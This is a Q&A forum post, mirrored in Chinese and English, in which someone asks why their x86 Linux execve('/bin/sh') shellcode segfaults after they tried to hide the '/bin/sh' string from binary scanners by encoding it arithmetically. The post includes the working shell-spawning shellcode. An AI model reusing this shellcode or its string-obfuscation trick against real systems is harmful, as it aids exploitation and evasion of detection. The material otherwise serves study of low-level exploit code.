通过用执行相同工作的另一条指令替换一条指令而导致分段错误。为什么？

发布于 2024-12-09 06:07:20 字数 780 浏览 0 评论 0原文

我有这个工作 shellcode 生成一个 shell 我必须修改它，以便在编译后隐藏二进制文件中任何位置的“/bin/sh”或“sh”。因此，我想到采用 /bin/sh(2f 62 69 6e 2f 73 68) 的十六进制值，向其中添加一些随机值（例如 0x11111）并将该值移动到寄存器，在运行时减去 0x11111，然后推送运行时生成的值（变成 /bin/sh）进入堆栈并执行 execv 但我在第一步本身就遇到了分段错误。我不明白为什么？

下面的代码工作正常。

section .data

section .text
    global _start
_start:

xor eax,eax
cdq
push eax
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80

但这种变化会导致分段错误，

section .data

section .text
    global _start
_start:

xor eax,eax
cdq
push eax
mov ecx,0x11111
mov ebx,0x68744040
sub ebx,ecx
push long eax
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80

请帮助我。会很感激。谢谢

原文

I have this working shellcode that spawns a shell
I have to modify it such that I hide "/bin/sh" or "sh" coming anywhere in the binary after compiling. I have hence thought of taking the hex value of /bin/sh(2f 62 69 6e 2f 73 68) adding some random value to it say 0x11111 and moving that value to a register, subtracting 0x11111 at runtime and then pushing that runtime generated value(which becomes /bin/sh) into the stack and doing an execv
But i get a segmentation fault on the 1st step itself. and i am unable to figure out why?

This below code works fine.

section .data

section .text
    global _start
_start:

xor eax,eax
cdq
push eax
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80

But this change causes a segmentation fault

section .data

section .text
    global _start
_start:

xor eax,eax
cdq
push eax
mov ecx,0x11111
mov ebx,0x68744040
sub ebx,ecx
push long eax
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80

Please help me on thie. Will be greatful. Thanks

分享到QQ

分享到微博